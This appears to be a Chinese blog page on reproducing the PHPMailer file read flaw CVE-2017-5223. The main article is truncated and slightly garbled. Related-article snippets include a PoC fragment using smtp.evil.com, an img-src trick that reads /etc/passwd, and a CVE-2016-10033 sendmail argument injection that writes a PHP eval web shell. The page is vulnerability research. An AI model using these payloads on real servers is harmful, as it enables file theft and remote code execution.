PHPMailer 任意文件读取漏洞(CVE-2017-5223)复现

最新推荐文章于 2025-05-26 16:54:54 发布
原创 最新推荐文章于 2025-05-26 16:54:54 发布 · 1.8k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#PHPMailer #任意文件读取 #cve

本文详细介绍了PHPMailer的CVE-2017-5223任意文件读取漏洞,包括漏洞概述、受影响的版本、复现步骤以及修复方案。攻击者可通过控制邮件中的图片src属性来读取服务器上的任意文件,如通过POC触发读取/etc/passwd。为防止此类攻击,建议及时将PHPMailer升级到5.2.21及以上版本。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

PHPMailer 任意文件读取漏洞(CVE-2017-5223)复现

  • 你剥开一个很酸的橙子而感到后悔了,可对于橙子来说,那是它的一切.

漏洞概述:

  • PHPMailer之前还有一个远程命令执行,闪现这次主要是由于PHPMailer在发送邮件的时,由于函数中接收了一个 p a t h 变 量 , 最 后 讲 path变量,最后讲 pathpath变量的值带入到了file_get_c
最低0.47元/天 解锁文章

200万优质内容无限畅学
PHPMailer远程命令执行漏洞复现(CVE-2016-10033)
谢公子的博客
04-05 2268
PHPMailer是一个基于PHP语言的邮件发送组件,被广泛运用于诸如WordPress、Drupal、1CRM、SugarCRM、Yii、Joomla等用户量巨大的应用与框架中。 CVE-2016-10033是PHPMailer中存在的高危漏洞,这个高危漏洞是由 class.phpmailer.php 没有正确处理用户的请求导致的攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造...
CVE-2016-10033)PHPMailer 远程代码执行漏洞
weixin_45253622的博客
06-23 2314
漏洞简介 PHPMailer是一个非常强大的 php发送邮件类,可以设定发送邮件地址、回复地址、邮件主题、html网页,上传附件,并且使用起来非常方便。 PHPMailer由于钓鱼系统sendmail命令,并且没有对输入做限制,攻击者可以通过利用 –X 参数把恶意代码写入 PHP 文件,达到执行命令的效果。 PHPMailer百度百科 利用条件 :PHP没有开启safe_mode(默认) 影响版本 :<5.2.18版本 漏洞复现 1.启动docker服务 service docker start 2
PHPMailer 任意文件读取漏洞
帅醉了的博客
11-20 548
CVE-2017-5223 POC <?php # Author:Yxlink require_once('PHPMailerAutoload.php'); $mail = new PHPMailer(); $mail->IsSMTP(); $mail->Host = "smtp.evil.com"; $mail->Port = 25; $mail->SMTPAuth = true; $mail->CharSet = "UTF-8"; $mail->E
PHPMailer 任意文件读取漏洞 CVE-2017-5223 漏洞复现
ADummy的博客
02-26 1299
PHPMailer 任意文件读取漏洞CVE-2017-5223) by ADummy 0x00利用路线 ​ 注册邮箱—>配置环境—>插入恶意代码—>目标服务器发送邮件—>服务器文件被读出 0x01漏洞介绍 ​ PHPMailer在发送邮件的过程中,会在邮件内容中寻找图片标签(<img src="...">),并将其src属性的值提取出来作为附件。所以,如果我们能控制部分邮件内容,可以利用<img src="/etc/passwd">将文件/etc/p
WordPress插件WP-Guru存在任意文件读取(CVE-2024-12849)
最新发布
swordheart的博客
05-26 353
WordPress 的 WP Guru 错误日志查看器插件在 1.0.1.3 及之前的所有版本中都容易受到通过 wp_ajax_nopriv_elvwp_log_download AJAX 操作进行任意文件读取的攻击。这使得未经身份验证的攻击者可以读取服务器上任意文件的内容,其中可能包含敏感信息。
PHPMailer 任意文件读取漏洞CVE-2017-5223
EC_Carrot的博客
07-20 767
漏洞详细 PHPMailer在发送邮件的过程中,会在邮件内容中寻找图片标签,即<img>,并将其src属性的值提取出来作为附件。 所以,如果我们能控制部分邮件内容,可以利用将文件/etc/passwd作为附件读取出来。 原理参考:https://www.seebug.org/vuldb/ssvid-92617 影响范围 PHPMailer < 5.2.21 漏洞复现 我环境启动不了,但是我会根据vulhub的实战文章讲讲。 在“意见反馈”页面,正常用户填写昵称、邮箱、意见提交,后端会返回
php查看邮件漏洞,PHPMailer任意文件读取漏洞分析(CVE-2017-5223
weixin_42100129的博客
03-11 375
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。*本文原创作者:Yxlink,本文属FreeBuf原创奖励计划,未经许可禁止转载PHPMailer是堪称全球最流行邮件发送类,其全球范围内的用户量大约有900万,被诸多开源项目所采用,包括WordPress、Drupal、1CRM、Joomla!等。铱迅安全团队于2017年1月6日发...
WordPress 4.6(PHPMailer)命令执行漏洞 (CVE-2016-10033)
SoulCat
02-08 4912
WordPress &lt;= 4.6 命令执行漏洞(CVE-2016-10033) 漏洞概述: 当WordPress 使用 PHPMailer 组件向用户发送邮件。攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数)、$run(系统调用函数)等构造payload,即可进行远程命令执行。 漏洞版本: WordPress &lt;= 4.6.0 PH...
php5.2漏洞,PHPMailer < 5.2.18 远程代码执行(CVE-2016-10033)漏洞分析
weixin_31188927的博客
03-11 877
Author: p0wd3r, dawu (知道创宇404安全实验室)Date: 2016-12-270x00 漏洞概述1.漏洞简介Dawid Golunski 在圣诞节当天发布了一个漏洞报告,报告中表明 PHPMailer 小于5.2.18的版本存在远程代码执行漏洞。成功利用该漏洞后,攻击者可以远程任意代码执行。许多知名的 CMS 例如 Wordpress 等都是使用这个组件来发送邮件,影响不可...
php查看邮件漏洞,()PHPMailer任意文件读取漏洞分析(CVE-2017-5223
weixin_39529914的博客
03-11 366
*本文原创作者:Yxlink,本文属FreeBuf原创奖励计划,未经许可禁止转载PHPMailer是堪称全球最流行邮件发送类,其全球范围内的用户量大约有900万,被诸多开源项目所采用,包括WordPress、Drupal、1CRM、Joomla!等。铱迅安全团队于2017年1月6日发现PHPMailer<=5.2.21版本存在任意文件读取漏洞,成功利用该漏洞,可获取服务器中的任意文件内容。...
经典CVEPHPMailer 远程命令执行漏洞
zh的博客
10-15 603
靶场地址:http://whalwl.site:8038/ 解题准备:了解PHPMailer 远程命令执行漏洞的利用方法 解题思路: 1、在右键发送页面,构造一句话 2、提示发送失败,但其实一句话已经完成 3、 尝试访问一句话,成功 4、蚁剑连接成功,去找flag把 ...
PHPMailer远程命令执行漏洞溯源
cc_de_csdn的博客
08-25 345
1.打开靶场,找到发送邮件的位置,进入邮件页面 2.填写邮件消息 1.任意用户名 2.在email写入: “aaa”. -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com 3.在message写入: <?php @eval($_POST[a]);?> 3.使用菜刀连接,链接是:http://219.153.49.228:4105...
phpmailer 私密抄送_PHPMailer又被发现严重漏洞 危及数百万网站
weixin_31346703的博客
12-23 204
近日,波兰安全研究员Dawid Golunski在开源PHPMalier发现了严重安全漏洞(CVE-2016-10033),它能允许攻击者在Web服务器上远程执行任意代码,入侵目标Web应用程序。PHPMailer是一款流行的开源PHP库,被全球超过900万的用户用于发送邮件。全球有数百万的PHP网站和开源Web应用程序(包括WordPress、Drupal、1CRM、SugarCRM、Yii、J...
漏洞情报 | PHPMailer 多个远程代码执行漏洞
爱国小白帽
06-18 651
​ 点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 PHPMailer是一个用于发送电子邮件的PHP类库。 2021年6月18日,360漏洞云监测到PHPMailer 6.5.0之前的版本存在多个远程代码执行漏洞CVE-2021-34551:该漏洞源于在处理$lang_path参数时对setLanguage()方法内用户提供数据的验证不足,远程攻击者可向应用传送一个特殊构造的输入,通过受影响的参数设置UNC路径,从而在系统上执行任意PHP代码。 CVE-2021-3603:该该漏洞
PHPMailer < 5.2.21 - Local File Disclosure(CVE-2017-5223
weixin_30888413的博客
11-10 226
    CVE-2017-5223PHPMailer < 5.2.21 - Local File Disclosure   本文主要介绍一下PHPMailer < 5.2.21 - Local File Disclosure漏洞的环境搭建和利用,关于漏洞的描述请参考下面的第二个链接。 环境搭建 说明   这里用到的邮件服务器是自己本地搭建的邮件服务器,我感觉其实也是可以用...
php定时执行代码漏洞_PHP远程代码执行漏洞(CVE201911043)复现
weixin_39755873的博客
01-10 364
漏洞详情漏洞说明#‍‍‍‍‍‍是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。该漏洞需要在nginx.conf中进行特定配置才能触发‍‍‍‍‍‍漏洞编号#CVE-2019-11043影响范围#在 Nginx + PHP-FPM 环境下,...
PHP任意文件上传漏洞
yanyanphp的专栏
04-03 1673
 安全研究人员今天发布了一个中危漏洞——PHP任意文件上传漏洞CVE-2015-2348)。 在上传文件的时候只判断文件名是合法的文件名就断定这个文件不是恶意文件,这确实会导致其他安全问题。并且在这种情况下,在你自己的文件中检查漏洞很不现实,因为这个漏洞可以绕过你对文件名后缀、文件类型(Content-Type)、Mime type、文件大小等的检查,所以仅仅依靠这些检查是救不了你的。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值